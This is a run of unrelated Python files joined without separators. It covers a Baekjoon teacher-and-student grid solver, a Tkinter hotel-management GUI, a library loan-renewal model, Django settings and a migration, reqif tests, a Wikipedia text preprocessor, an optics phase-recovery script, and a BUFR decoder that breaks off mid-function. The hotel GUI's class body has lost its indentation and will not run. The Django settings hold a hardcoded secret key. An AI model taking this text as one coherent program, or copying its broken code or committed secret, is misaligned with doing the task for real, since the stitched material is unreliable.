# T X S X X
# X X X X X
# X T X X X
# X X T X X
# https://www.acmicpc.net/problem/18428
from itertools import combinations
def dfs(teacher, room, d):
    """Walk from `teacher` one step at a time in direction `d`, marking every
    student ('S') on the line of sight as watched ('W').

    Stops at the board edge, another teacher ('T'), or an obstacle ('O').
    Relies on module-level `n` (board size), `dx`, `dy` (direction deltas).
    Mutates `room` in place.
    """
    x, y = teacher
    # Fix/idiom: the original looped over all four directions and skipped
    # every one except `d`, so the body ran exactly once -- step directly.
    nx = x + dx[d]
    ny = y + dy[d]
    if not (0 <= nx < n and 0 <= ny < n):
        return  # walked off the board
    if room[nx][ny] == 'X':
        # Empty cell: keep looking along the same direction.
        dfs((nx, ny), room, d)
    elif room[nx][ny] == 'S':
        # Student spotted: mark as watched and keep looking past them.
        room[nx][ny] = 'W'
        dfs((nx, ny), room, d)
    else:
        # 'T' (teacher) or 'O' (obstacle) blocks the line of sight.
        return
# Read the n x n board: X = empty, S = student, T = teacher.
n = int(input())
room = [list(input().split()) for _ in range(n)]
blank_pos = []
teacher_pos = []
student_pos = []
# Classify every cell position by its content.
for i in range(n):
    for j in range(n):
        if room[i][j] == 'X':
            blank_pos.append((i, j))
        elif room[i][j] == 'S':
            student_pos.append((i, j))
        else:
            teacher_pos.append((i, j))
# Up, down, left, right deltas used by dfs().
dx = [-1, 1, 0, 0]
dy = [0, 0, -1, 1]
sw = False
# Brute force: try every placement of 3 obstacles ('O') on empty cells.
for blank in combinations(blank_pos, 3):
    # Rebuild a fresh board copy for this obstacle placement.
    tmp = [[0] * n for _ in range(n)]
    for b in blank_pos:
        x, y = b
        tmp[x][y] = 'X'
    for o in blank:
        x, y = o
        tmp[x][y] = 'O'
    for t in teacher_pos:
        x, y = t
        tmp[x][y] = 'T'
    for s in student_pos:
        x, y = s
        tmp[x][y] = 'S'
    # Let every teacher look in all four directions; seen students become 'W'.
    for teacher in teacher_pos:
        for i in range(4):
            dfs(teacher, tmp, i)
    # for a in range(n):
    # for b in range(n):
    # print(tmp[a][b], end=' ')
    # print()
    # print()
    # Collect students that were watched under this placement.
    aaa = []
    for student in student_pos:
        x, y = student
        if tmp[x][y] == 'W':
            aaa.append('W')
    #print('aaa', aaa)
    # No watched students: this placement hides everyone -- success.
    if not aaa:
        sw = True
        break
if sw:
    print('YES')
else:
    print('NO')
from tkinter import*
from PIL import Image, ImageTk
from customer import Customer_Window
class Hotel_Management_System:
def __init__(self, root):
self.root = root
self.root.title("Hotel Management System")
self.root.geometry("1920x1080+0+0")
# --------Header Image-------
img1 = Image.open(r"S:\projects\GUI based Hotel Management System Using Database in MySQL\Images\header1.jpg")
img1 = img1.resize((1920,140),Image.ANTIALIAS)
self.photoimg1 = ImageTk.PhotoImage(img1)
lbling = Label(self.root, image=self.photoimg1, relief=RIDGE)
lbling.place(x=0, y=0, width=1920, height=140)
# ---------Main Frame-----------
main_frame = Frame(self.root, bd=4, relief=RIDGE)
main_frame.place(x=0, y=140, width=1920, height=908)
# -----------Navigation Menu-------------
lbl_menu = Label(main_frame, text="Menu", font=("times new roman", 20, "bold"), bg="lightblue", fg="white", bd=1, relief=RIDGE)
lbl_menu.place(x=0, y=0, width=230)
# ---------Button Frame-----------
btn_frame = Frame(main_frame, bd=0, relief=RIDGE)
btn_frame.place(x=0, y=35, width=230, height=180)
customer_btn = Button(btn_frame, text="Customer", command=self.customer_details, width=22, font=("times new roman", 14, "bold"), bg="lightblue", fg="white", bd=0, cursor="hand2")
customer_btn.grid(row=0, column=0, pady=1)
room_btn = Button(btn_frame, text="Room", width=22, font=("times new roman", 14, "bold"), bg="lightblue", fg="white", bd=0, cursor="hand2")
room_btn.grid(row=1, column=0, pady=1)
details_btn = Button(btn_frame, text="Details", width=22, font=("times new roman", 14, "bold"), bg="lightblue", fg="white", bd=0, cursor="hand2")
details_btn.grid(row=2, column=0, pady=1)
report_btn = Button(btn_frame, text="Report", width=22, font=("times new roman", 14, "bold"), bg="lightblue", fg="white", bd=0, cursor="hand2")
report_btn.grid(row=3, column=0, pady=1)
logout_btn = Button(btn_frame, text="LogOut", width=22, font=("times new roman", 14, "bold"), bg="lightblue", fg="white", bd=0, cursor="hand2")
logout_btn.grid(row=4, column=0, pady=1)
# ---------Main Body Image-----------
img3 = Image.open(r"S:\projects\GUI based Hotel Management System Using Database in MySQL\Images\body1.jpg")
img3 = img3.resize((1670,900),Image.ANTIALIAS)
self.photoimg3 = ImageTk.PhotoImage(img3)
lbling1 = Label(main_frame, image=self.photoimg3, bd=0, relief=RIDGE)
lbling1.place(x=235, y=0, width=1670, height=900)
# -----------Navigation Images--------
img4 = Image.open(r"S:\projects\GUI based Hotel Management System Using Database in MySQL\Images\restaurant.jpg")
img4 = img4.resize((230,210),Image.ANTIALIAS)
self.photoimg4 = ImageTk.PhotoImage(img4)
lbling2 = Label(main_frame, image=self.photoimg4, bd=0, relief=RIDGE)
lbling2.place(x=0, y=225, width=230, height=210)
img5 = Image.open(r"S:\projects\GUI based Hotel Management System Using Database in MySQL\Images\swimimgpool.jpg")
img5 = img5.resize((230,190),Image.ANTIALIAS)
self.photoimg5 = ImageTk.PhotoImage(img5)
lbling3 = Label(main_frame, image=self.photoimg5, bd=0, relief=RIDGE)
lbling3.place(x=0, y=440, width=230, height=190)
img6 = Image.open(r"S:\projects\GUI based Hotel Management System Using Database in MySQL\Images\room.jpg")
img6 = img6.resize((230,190),Image.ANTIALIAS)
self.photoimg6 = ImageTk.PhotoImage(img6)
lbling4 = Label(main_frame, image=self.photoimg6, bd=0, relief=RIDGE)
lbling4.place(x=0, y=635, width=230, height=190)
def customer_details(self):
    """Open the customer-details screen in a new top-level window."""
    # Keep references on self so Tkinter does not garbage-collect the window/app.
    self.new_window = Toplevel(self.root)
    self.app = Customer_Window(self.new_window)
if __name__ == "__main__":
    # Create the Tk root window, build the application, and enter the event loop.
    root = Tk()
    obj = Hotel_Management_System(root)
    root.mainloop()
#coding:utf-8
import datetime
import web
import op_reader
import op_book
import op_borrow
from model_base import ModelBase
from model_giveback import ModelGiveback
from model_lost import ModelLost
class ModelRenew(ModelBase):
    """Book-loan renewal model: eligibility checks, UI aggregation and the
    renew transaction itself."""

    def check_borrexp(self, borrnow):
        # A loan can only be renewed while it has not yet expired (whole-day granularity).
        return borrnow.borrexpdt.date() >= datetime.datetime.now().date()

    def check_renewtimes(self, borrnow, reader):
        # The reader's type caps how often a single loan may be renewed.
        return borrnow.renewtimes < reader.typrenewtimes

    def ui_reader(self, readercardno):
        """Build the renewal UI view for one reader.

        Returns the reader object with a ``borrnowArr`` attribute holding the
        current loans, each annotated with computed ("*_c") eligibility,
        overdue-fee and lost-fee fields; returns None for an unknown card.
        """
        reader = self.get_reader(readercardno)
        if not reader: return
        op_reader.bind_ref(reader)
        borrnowArr = []
        for b in self.query_borrnow2(reader.readerid):
            op_book.bind_ref(b)
            b.notborrexp_c = self.check_borrexp(b)
            b.renewtimes_c = self.check_renewtimes(b, reader)
            # Overdue days/fee are computed by the give-back model.
            give = ModelGiveback()
            b.overdays_c = give.calc_overdays(b)
            b.typoverprice_c = reader.typoverprice
            b.overprice_c = give.calc_overprice(b.overdays_c, reader)
            # Lost-book compensation is computed by the lost model.
            lost = ModelLost()
            b.typlostpay_c = reader.typlostpay
            b.lostprice_c = lost.calc_lostprice(b, reader)
            b.sumprice_c = b.overprice_c + b.lostprice_c
            borrnowArr.append(b)
        reader.borrnowArr = borrnowArr
        return reader

    def post_renew(self, operator, bookinsid, newexpdt, renewtimes):
        # Persist the renewal (delegates to the borrow operations module).
        op_borrow.renew(operator, bookinsid, newexpdt, renewtimes)

    def renew(self, operator, bookinsid, bookclsid = None, bookname = None):
        """Try to renew the loan of one book instance.

        Returns True on success; False when the loan is unknown, already
        expired, the reader is unknown, or the renewal limit is reached.
        Side effects: stores newexpdt/renewtimes on self, persists the
        renewal, and writes a 'RENEW' log entry.
        """
        borrnow = self.get_borrnow(bookinsid)
        if not borrnow: return False
        if not self.check_borrexp(borrnow): return False
        reader = self.get_reader(borrnow.readercardno)
        if not reader: return False
        if not self.check_renewtimes(borrnow, reader): return False
        # New expiry = old expiry + the reader type's renewal term (in days).
        self.newexpdt = borrnow.borrexpdt + datetime.timedelta(days = reader.typrenewterm)
        self.renewtimes = borrnow.renewtimes + 1
        self.post_renew(operator, bookinsid, self.newexpdt, self.renewtimes)
        self.log(insby = operator,
                 readercardno = borrnow.readercardno,
                 readerid = borrnow.readerid,
                 readername = reader.readername,
                 bookclsid = bookclsid,
                 bookinsid = bookinsid,
                 bookname = bookname,
                 actcd = 'RENEW',
                 actval = self.renewtimes)
        return True

    def ui_renew(self, operator, bookinsid, bookclsid = None, bookname = None):
        """Renew and return a web.Storage carrying newexpdt/renewtimes on
        success; the Storage stays empty when the renewal failed."""
        ret = web.Storage()
        if self.renew(operator, bookinsid, bookclsid, bookname):
            ret.newexpdt = self.newexpdt
            ret.renewtimes = self.renewtimes
        return ret
|
from rest_framework import serializers
from Blog.models import MovieShots
class MovieShotsSerializer(serializers.ModelSerializer):
    """Serializes every field of the MovieShots model for the REST API."""

    class Meta:
        model = MovieShots
        # NOTE(review): '__all__' exposes every model field; list fields
        # explicitly if some columns should stay private.
        fields = '__all__'
import unittest
from . import utils as TE
class TestReqifEnumValue(unittest.TestCase):
    """Unit tests for the reqif ENUM-VALUE element (decode and encode)."""

    def setUp(self):
        # Fresh ENUM-VALUE object for every test.
        self.obj = TE.TReqz.reqif_enum_value()

    def test_name(self):
        # The element must report its reqif tag name.
        self.assertEqual("ENUM-VALUE", self.obj.name)

    def test_decode(self):
        # Shared identifiable-attribute checks plus the nested EMBEDDED-VALUE child.
        TE.utils.testDecodeIdentifiableAttributes(self, self.obj)
        TE.utils.decodeObj(self.obj, '<ENUM-VALUE><PROPERTIES><EMBEDDED-VALUE /></PROPERTIES></ENUM-VALUE>', None)
        self.assertIsNotNone(self.obj.embedded_value)
        self.assertEqual("EMBEDDED-VALUE", self.obj.embedded_value.name)

    def test_encode(self):
        # The PROPERTIES wrapper is only emitted when an embedded value is set.
        TE.utils.testEncodeIdentifiableAttributes(self, self.obj)
        self.assertEqual("<ENUM-VALUE><PROPERTIES><EMBEDDED-VALUE /></PROPERTIES></ENUM-VALUE>", TE.utils.encodeObj(self.obj, {'embedded_value':TE.TReqz.reqif_embeded_value()}))
        self.assertEqual("<ENUM-VALUE />", TE.utils.encodeObj(self.obj, {'embedded_value':None}))
# Django settings for mango project.
from django.utils.translation import ugettext_lazy as _
import os
DEBUG = True
TEMPLATE_DEBUG = DEBUG

ADMINS = (
    # ('Your Name', 'your_email@domain.com'),
)

MANAGERS = ADMINS

DATABASES = {
    'default': {
        'ENGINE': 'django.db.backends.sqlite3',
        'NAME' : os.path.join(os.path.dirname(__file__), "mango.db")
    },
    # For the mirrors application
    #'gnome_mirrors': {
    #    'ENGINE' : 'django.db.backends.mysql',
    #    'NAME' : 'mirrors',
    #    'USER' : 'dbuser',
    #    'PASSWORD' : 'dbpass',
    #},
    # For the requests application
    #'account_requests': {
    #    'ENGINE' : 'django.db.backends.mysql',
    #    'NAME' : 'mango',
    #    'USER' : 'dbuser',
    #    'PASSWORD' : 'dbpass',
    #},
}

DATABASE_ROUTERS = [
    "ldapdb.router.Router",
    "mango.mirrors.routers.MirrorRouter",
    "mango.requests.routers.AccountRequestRouter",
    "mango.members.routers.FoundationMemberRouter",
]

# Local time zone for this installation. Choices can be found here:
# http://en.wikipedia.org/wiki/List_of_tz_zones_by_name
# although not all choices may be available on all operating systems.
# If running in a Windows environment this must be set to the same as your
# system time zone.
TIME_ZONE = 'UTC'

# Language code for this installation. All choices can be found here:
# http://www.i18nguy.com/unicode/language-identifiers.html
LANGUAGE_CODE = 'en-us'

SITE_ID = 1

# If you set this to False, Django will make some optimizations so as not
# to load the internationalization machinery.
USE_I18N = True

# Absolute path to the directory that holds media.
# Example: "/home/media/media.lawrence.com/"
MEDIA_ROOT = ''

# URL that handles the media served from MEDIA_ROOT. Make sure to use a
# trailing slash if there is a path component (optional in other cases).
# Examples: "http://media.lawrence.com", "http://example.com/media/"
MEDIA_URL = '/static_media/'

# URL prefix for admin media -- CSS, JavaScript and images. Make sure to use a
# trailing slash.
# Examples: "http://foo.com/media/", "/media/".
ADMIN_MEDIA_PREFIX = '/media/'

# Make this unique, and don't share it with anybody.
# SECURITY NOTE(review): this key is committed to the repository; any real
# deployment must override it with a secret value in local_settings.py.
SECRET_KEY = 'u(9-ndez*a1wi-438du+!rx$o+7nntz1w$tb0i_3m)+w$jt=sh'

# List of callables that know how to import templates from various sources.
TEMPLATE_LOADERS = (
    'django.template.loaders.filesystem.load_template_source',
    'django.template.loaders.app_directories.load_template_source',
)

SESSION_ENGINE = "django.contrib.sessions.backends.file"

MIDDLEWARE_CLASSES = (
    'django.middleware.common.CommonMiddleware',
    'django.contrib.sessions.middleware.SessionMiddleware',
    'django.contrib.auth.middleware.AuthenticationMiddleware',
)

TEMPLATE_CONTEXT_PROCESSORS = (
    'django.contrib.auth.context_processors.auth',
    'django.core.context_processors.i18n',
    'django.core.context_processors.media',
    'django.core.context_processors.request',
)

ROOT_URLCONF = 'mango.urls'

TEMPLATE_DIRS = (
    # Put strings here, like "/home/html/django_templates" or "C:/www/django/templates".
    # Always use forward slashes, even on Windows.
    # Don't forget to use absolute paths, not relative paths.
    os.path.join(os.path.dirname(__file__), "templates"),
)

INSTALLED_APPS = (
    'django.contrib.contenttypes',
    'django.contrib.sessions',
    'django.contrib.sites',
    'django.contrib.auth',
    'django.contrib.admin',
    # For natural days in account requests
    'django.contrib.humanize',
    # Actual mango applications
    'users',
    'mirrors',
    'members',
    'requests',
    # For the pretty
    'uni_form',
    # For the omni-search
    'haystack',
)

# For the omni-search box to work
HAYSTACK_SITECONF = 'mango.search_sites'
HAYSTACK_SEARCH_ENGINE = 'whoosh'
HAYSTACK_WHOOSH_PATH = os.path.join(os.path.dirname(__file__), "search_indexes.whoosh")

MANGO_USER_HOMEDIR_BASE = '/home/users'

PROJECT_TITLE = _('GNOME Mango Accounts System')

# local_settings.py can be used to override environment-specific settings
# like database and email that differ between development and production.
PROJECT_ROOT = os.path.abspath(os.path.dirname(__file__))
local_settings = os.path.join(PROJECT_ROOT, 'local_settings.py')
if os.path.isfile(local_settings):
    try:
        execfile(local_settings)
    except Exception:
        # BUGFIX: the previous bare "except: pass" silently swallowed any
        # error (even a syntax error) in local_settings.py, making broken
        # overrides impossible to diagnose.  Report the failure, then keep
        # starting up with the defaults (preserving best-effort semantics).
        import sys
        import traceback
        sys.stderr.write("Could not load %s:\n" % local_settings)
        traceback.print_exc()
|
import logging
import os
from wikipedia import page
import word2vec.word2vec_utitlity as util
logging.basicConfig(format='%(asctime)s : %(levelname)s : %(message)s', level=logging.INFO)
logger = logging.getLogger("TrainingDataImporter")
class WikipediaPageProcessor:
    """Downloads Wikipedia articles and pre-processes them into
    whitespace-tokenised, stopword-free text files for word2vec training.
    """

    # Prefix for all generated source/processed files.
    file_prefix = "wiki_"

    def __init__(self, titles, training_data_directory="../training/"):
        # titles: iterable of Wikipedia page titles to fetch and process.
        self.titles = titles
        self.source_files = training_data_directory+"sources/"
        self.preprocessed_files = training_data_directory+"processed/"

    def download(self):
        """Fetch each article's plain-text content into sources/.

        Already-downloaded files are kept and skipped.
        """
        logger.info("Start downloading pages from wikipedia: " + str(self.titles))
        for title in self.titles:
            filepath = self.source_files + self.file_prefix + title + ".txt"
            if os.path.exists(filepath):
                logger.info("File " + title + " already exists in target directory. Skipping file")
                continue
            logger.info("Loading wikipage: " + title)
            wikipage = page(title, auto_suggest=False)
            content = wikipage.content
            os.makedirs(os.path.dirname(filepath), exist_ok=True)
            # BUGFIX: write UTF-8 explicitly -- article text is Unicode and the
            # platform default encoding (e.g. cp1252) may fail on it.
            with open(filepath, "w", encoding="utf-8") as f:
                f.write(content)
        logger.info("Finished downloading wikipedia articles")

    def process(self):
        """Clean, tokenise and stopword-filter each article into processed/."""
        stop = util.get_stopwords()
        logger.info("Loading source files for pre-processing")
        for title in self.titles:
            target_filepath = self.preprocessed_files + self.file_prefix + title + ".txt"
            source_filepath = self.source_files + self.file_prefix + title + ".txt"
            if os.path.exists(target_filepath):
                logger.info("File " + title + " already exists in target directory. Skipping file")
                continue
            logger.info("Pre-processing file: " + title)
            if not os.path.exists(source_filepath):
                logger.warning("Sourcefile " + title + " does not exist. Skipping...")
                continue
            # BUGFIX: read/write UTF-8 explicitly to match download().
            with open(source_filepath, "r", encoding="utf-8") as f_in:
                os.makedirs(os.path.dirname(target_filepath), exist_ok=True)
                with open(target_filepath, "w", encoding="utf-8") as f_out:
                    for line in f_in:
                        cleaned_content = util.clean_str(line)
                        cleaned_words = cleaned_content.split()
                        tokens = [word for word in cleaned_words if word not in stop]
                        # BUGFIX: use "\n", not os.linesep -- in text mode the
                        # newline is translated on write, so os.linesep would
                        # produce "\r\r\n" on Windows.
                        f_out.write(" ".join(tokens) + "\n")
        logger.info("Pre-processing finished.")
|
# -- coding: utf-8
# Read a (four-digit) integer and report its largest decimal digit.
x = int(input())
thousands = x // 1000
hundreds = x % 1000 // 100
tens = x % 100 // 10
ones = x % 10
print('У числа ', x, 'максимальная цифра равна ', max(thousands, hundreds, tens, ones))
#! /usr/bin/python
"""
Phase recovery from two measured intensity distributions using Gerchberg Saxton.
.. :copyright: (c) 2017 by Fred van Goor.
:license: MIT, see License for more details.
"""
import matplotlib.pyplot as plt
import numpy as np
from LightPipes import *
print(LPversion)

# Parameters used for the experiment:
size = 11*mm           # the CCD-sensor has an area of size x size (NB LightPipes needs square grids!)
wavelength = 632.8*nm  # wavelength of the HeNe laser used
z = 2*m                # propagation distance from near to far field
N_iterations = 300     # number of Gerchberg-Saxton iterations

def read_intensity(filename):
    """Read a whitespace-separated intensity matrix from *filename*."""
    # Closes the file deterministically (the original leaked the handle).
    with open(filename, 'r') as fh:
        data = [line.split() for line in fh]
    return np.asfarray(data)

# Read near and far field (at a distance of z=2 m) from disk:
Inear = read_intensity('Inear.prn')
Ifar = read_intensity('Ifar.prn')

N = len(Inear)
N_new = 256
size_new = 40*mm

plt.subplot(3,2,1); plt.imshow(Inear, cmap='jet')
plt.title('Measured Intensity near field'); plt.axis('off')
plt.subplot(3,2,2); plt.imshow(Ifar, cmap='jet')
plt.title('Measured Intensity far field'); plt.axis('off')

# Define a field with uniform amplitude- (=1) and phase (=0) distribution
# (= plane wave)
F = Begin(size, wavelength, N)

# The iteration.
# BUGFIX: honour N_iterations -- the loop previously hard-coded
# range(1, 100) while N_iterations was declared as 300 but never used.
for k in range(1, N_iterations):
    print(k)
    F = SubIntensity(Ifar, F)                     # substitute the measured far field into the field
    F = Interpol(size_new, N_new, 0, 0, 0, 1, F)  # interpolate to a new grid
    F = Forvard(-z, F)                            # propagate back to the near field
    F = Interpol(size, N, 0, 0, 0, 1, F)          # interpolate to the original grid
    F = SubIntensity(Inear, F)                    # substitute the measured near field into the field
    F = Forvard(z, F)                             # propagate to the far field

# The recovered far- and near field and their phase- and intensity
# distributions (phases are unwrapped, i.e. multiples of PI removed):
Ffar_rec = F
Ifar_rec = Intensity(0, Ffar_rec)
Phase_far_rec = PhaseUnwrap(Phase(Ffar_rec))
Fnear_rec = Forvard(-z, F)
Inear_rec = Intensity(0, Fnear_rec)
Phase_near_rec = PhaseUnwrap(Phase(Fnear_rec))

# Plot the recovered intensity- and phase distributions:
plt.subplot(3,2,3); plt.imshow(Inear_rec, cmap='jet')
plt.title('Recovered Intensity near field'); plt.axis('off')
plt.subplot(3,2,4); plt.imshow(Ifar_rec, cmap='jet')
plt.title('Recovered Intensity far field'); plt.axis('off')
plt.subplot(3,2,5); plt.imshow(Phase_near_rec, cmap='jet')
plt.title('Recovered phase near field'); plt.axis('off')
plt.subplot(3,2,6); plt.imshow(Phase_far_rec, cmap='jet')
plt.title('Recovered phase far field'); plt.axis('off')
plt.show()
|
# Empty class sample
class EmpltyClass:
    """Deliberately empty sample class (name keeps its original typo)."""
# Sample var & Method declaration
class FirstLevelSample:
    # NOTE: this print runs once, at class-definition time (module import),
    # not when instances are created.
    print('First Hello From FirstLevelSample Class')
# Instantiate the sample classes; printing an instance shows its default repr.
f1 = FirstLevelSample()
e = EmpltyClass()
print(e)
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
    """Alter realms.Page.page_slug to a blank-able CharField(max_length=255)
    with a verbose name and help text (auto-generated migration)."""

    dependencies = [
        ('realms', '0017_auto_20171213_1943'),
    ]

    operations = [
        migrations.AlterField(
            model_name='page',
            name='page_slug',
            field=models.CharField(verbose_name='URL slug', max_length=255, blank=True, help_text='URL friendly name; lowercase, numbers and underscores only.'),
        ),
    ]
|
import torch
class Placeholder(torch.nn.Module):
    """Identity "encoder" used when predicting directly on embeddings.

    Keeps the training infrastructure shape-compatible while passing every
    input through untouched.  Note that out_shape is deliberately None.
    """

    def __init__(self):
        super().__init__()
        self.name = "Placeholder"

    def make_model(self, model_params):
        """Record the bookkeeping attributes the training pipeline expects."""
        shape = model_params['in_shape']
        self.in_shape = shape
        self.dims = len(shape)
        self.out_channels = model_params["h_channels"]
        # No spatial output shape: the data bypasses the encoder entirely.
        self.out_shape = None

    def forward(self, raw):
        # Pure pass-through.
        return raw
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright (c) 2016 Alexander Maul
#
# Author(s):
#
# Alexander Maul <alexander.maul@dwd.de>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
'''
trollbufr-Subset
================
The class doing all decoding, table-loading, etc in the right order.
Created on Oct 28, 2016
@author: amaul
'''
import functions as f
from errors import BufrDecodeError
import logging
logger = logging.getLogger("trollbufr")
class Subset(object):
    """Decodes the data section (Sect. 4) of one BUFR subset.

    Walks the descriptor list, expanding sequences, replications and
    operators, and yields decoded values via next_data().
    """
    # Numbering of this subset (this, total)
    subs_num = (-1, -1)
    # Compression
    is_compressed = False
    # Currently decoding a subset
    inprogress = False
    # Holds table object
    _tables = None
    # Holds byte array with bufr
    _blob = None
    # Initial descriptor list
    _desc = []
    # End of data for all subsets
    _data_e = -1
    # Alterator values
    _alter = {}
    # Remaining descriptors affected by operator 221YYY (data not present)
    _skip_data = 0

    def __init__(self, tables, bufr, descr_list, is_compressed, subset_num, data_end):
        self._tables = tables
        self._blob = bufr
        self._desc = descr_list
        self.is_compressed = is_compressed
        self.subs_num = subset_num
        self._data_e = data_end

    def __str__(self):
        # BUGFIX: subs_num is a (this, total) tuple; the format string takes
        # three arguments, so the tuple must be unpacked (the previous code
        # raised "not enough arguments for format string").
        return "Subset #%d/%d, decoding:%s" % (self.subs_num[0], self.subs_num[1], self.inprogress)

    def next_data(self):
        """
        Iterator for Sect. 4 data.

        This generator will decode BUFR data.
        For each data element the descriptor and a tuple of value and quality information is returned.
        When a value for mark is returned, the others are None, and mark has the meaning:
        - SEQ desc : Following descriptors by expansion of sequence descriptor desc.
        - SEQ END  : End of sequence expansion.
        - RPL #n   : Descriptor replication number #n begins.
        - RPL END  : End of descriptor replication.
        - RPL NIL  : Descriptor replication evaluated to zero replications.
        - REP #n   : Descriptor and data repetition, all descriptor and data between
                     this and REP END are to be repeated #n times.
        - REP END  : End of descriptor and data repetition.
        RETURN: desc, mark, (value, quality)
        """
        if self._blob.p < 0 or self._data_e < 0 or self._blob.p >= self._data_e:
            raise BufrDecodeError("Data section start/end not initialised!")
        logger.debug("SUBSET START")
        self.inprogress = True
        # Stack for sequence expansion and loops.
        # Items follow: ([desc,], start, end, mark)
        stack = []
        # Alterator values, this resets them at the beginning of the iterator.
        self._alter = self._reset_alter()
        # For start put list on stack
        logger.debug("PUSH start -> *%d %d..%d" , len(self._desc), 0, len(self._desc))
        stack.append((self._desc, 0, len(self._desc), "SUB"))
        while len(stack):
            # Loop while descriptor lists are on the stack.
            # dl : current descriptor list
            # di : index for current descriptor list
            # de : stop when reaching this index
            dl, di, de, mark = stack.pop()
            logger.debug("POP *%d %d..%d (%s)" , len(dl), di, de, mark)
            yield None, mark, (None, None)
            mark = None
            while di < de and self._blob.p < self._data_e:
                # Loop over descriptors in the current list.
                if self._skip_data:
                    # Data not present: data is limited to classes 01-09 and 31.
                    self._skip_data -= 1
                    # BUGFIX: the class of an element descriptor is dl[di]//1000;
                    # the previous "% 1000 != 31" compared the YYY part instead.
                    if dl[di] >= 10000 and dl[di] // 1000 != 31:
                        di += 1
                        continue
                if dl[di] == 0:
                    # Null-descriptor to signal end-of-list.
                    di += 1
                elif dl[di] > 0 and dl[di] < 100000:
                    # Element descriptor, decoding bits to value.
                    # Associated fields (for qualifier) precede the element's value,
                    # their width is set by an operator descr.
                    # They are handled in compression in the same manner as other descr,
                    # with fix width from assoc-field-stack.
                    if self._alter['assoc'][-1] and (dl[di] < 31000 or dl[di] > 32000):
                        qual = f.get_rval(self._blob, self.is_compressed, self.subs_num, fix_width=self._alter['assoc'][-1])
                    else:
                        qual = None
                    elem_b = self._tables.tab_b[dl[di]]
                    di += 1
                    foo = f.get_rval(self._blob, self.is_compressed, self.subs_num, elem_b, self._alter)
                    v = f.rval2num(elem_b, self._alter, foo)
                    # This is the main yield
                    yield elem_b.descr, mark, (v, qual)
                elif dl[di] >= 100000 and dl[di] < 200000:
                    # Replication descriptor: loop/iterator, replication or repetition.
                    # Decode loop-descr:
                    # amount of descr
                    lm = dl[di] // 1000 - 100
                    # number of replication
                    ln = dl[di] % 1000
                    # Repetition?
                    ir = False
                    # Increase di to start-of-loop
                    di += 1
                    if ln == 0:
                        # Decode next descr for loop-count
                        if dl[di] < 30000 or dl[di] >= 40000:
                            raise BufrDecodeError("No count for delayed loop!")
                        elem_b = self._tables.tab_b[dl[di]]
                        di += 1
                        # TODO: are the 031xxx really not altered?
                        ln = f.get_rval(self._blob, self.is_compressed, self.subs_num, fix_width=elem_b.width)
                        # Descriptors 31011+31012 mean repetition, not replication
                        ir = elem_b.descr >= 31010 and elem_b.descr <= 31012
                        logger.debug("%s %d %d -> %d from %06d", "REPT" if ir else "LOOP", lm, 0, ln, elem_b.descr)
                        if ln == 255:
                            ln = 0
                    else:
                        logger.debug("LOOP %d %d" % (lm, ln))
                    # Current list on stack (di points after looped descr)
                    logger.debug("PUSH jump -> *%d %d..%d" , len(dl), di + lm, de)
                    if ir:
                        if ln:
                            stack.append((dl, di + lm, de, "REP END"))
                            stack.append((dl, di, di + lm, "REP %d" % ln))
                        else:
                            stack.append((dl, di + lm, de, "REP NIL"))
                    else:
                        stack.append((dl, di + lm, de, "RPL %s" % ("END" if ln else "NIL")))
                        while ln:
                            # N*list on stack
                            logger.debug("PUSH loop -> *%d %d..%d" , len(dl), di , di + lm)
                            stack.append((dl, di, di + lm, "RPL %d" % ln))
                            ln -= 1
                    # Causes inner while to end
                    di = de
                elif dl[di] >= 200000 and dl[di] < 300000:
                    # Operator descriptor: alter/modify properties.
                    di, v = self._eval_oper(dl, di, de)
                    if v is not None:
                        # If the operator (signify) returned a value, yield it
                        yield v
                    di += 1
                elif dl[di] >= 300000 and dl[di] < 400000:
                    # Sequence descriptor: replaces current descriptor with its expansion.
                    logger.debug("SEQ %06d" , dl[di])
                    # Current on stack
                    logger.debug("PUSH jump -> *%d %d..%d" , len(dl), di + 1, de)
                    stack.append((dl, di + 1, de, "SEQ END"))
                    prevdesc = dl[di]
                    # Sequence from tabD
                    dl = self._tables.tab_d[dl[di]]
                    # Expansion on stack
                    logger.debug("PUSH seq -> *%d %d..%d" , len(dl), 0, len(dl))
                    stack.append((dl, 0, len(dl), "SEQ %06d" % prevdesc))
                    # Causes inner while to end
                    di = de
                else:
                    # Invalid descriptor, out of defined range.
                    raise BufrDecodeError("Descriptor '%06d' invalid!" % dl[di])
        self.inprogress = False
        logger.debug("SUBSET END (%s)" % self._blob)
        # BUGFIX (PEP 479): a generator must simply return when exhausted;
        # "raise StopIteration" becomes a RuntimeError on Python 3.7+.
        return

    def _eval_oper(self, dl, di, de):
        """
        Evaluate operator, read octets from data section if necessary.
        RETURN: di, (desc,mark,(value,qual))|None
        """
        l_di = di
        l_rval = None
        if dl[l_di] < 222000:
            am = dl[l_di] // 1000 - 200
            an = dl[l_di] % 1000
            logger.debug("OP %d %d", am, an)
            if am == 1:
                # Change data width
                self._alter['wnum'] = an - 128 if an else 0
            elif am == 2:
                # Change scale
                self._alter['scale'] = an - 128 if an else 0
            elif am == 3:
                # Set of new reference values
                if an == 0:
                    self._alter['refval'] = {}
                else:
                    l_di = self._read_refval(dl, l_di, de)
                logger.debug("OP refval -> %s" % self._alter['refval'])
            elif am == 4:
                # Add associated field, shall be followed by 031021.
                # Manages stack for associated field, the value added last shall be used.
                if an == 0:
                    self._alter['assoc'].pop()
                    if not len(self._alter['assoc']):
                        self._alter['assoc'] = [0]
                else:
                    self._alter['assoc'].append(self._alter['assoc'][-1] + an)
            elif am == 5:
                # Signify with characters, plain language text as returned value.
                foo = f.get_rval(self._blob, self.is_compressed, self.subs_num, fix_width=an * 8)
                v = f.rval2str(foo)
                logger.debug("OP text -> '%s'", v)
                # Special rval for plain character
                l_rval = (dl[l_di], None, (v, None))
            elif am == 6:
                # Length of local descriptor
                f.get_rval(self._blob, self.is_compressed, self.subs_num, fix_width=an)
                l_di += 1
            elif am == 7:
                # 207YYY: increase scale, reference values and data width together.
                if an == 0:
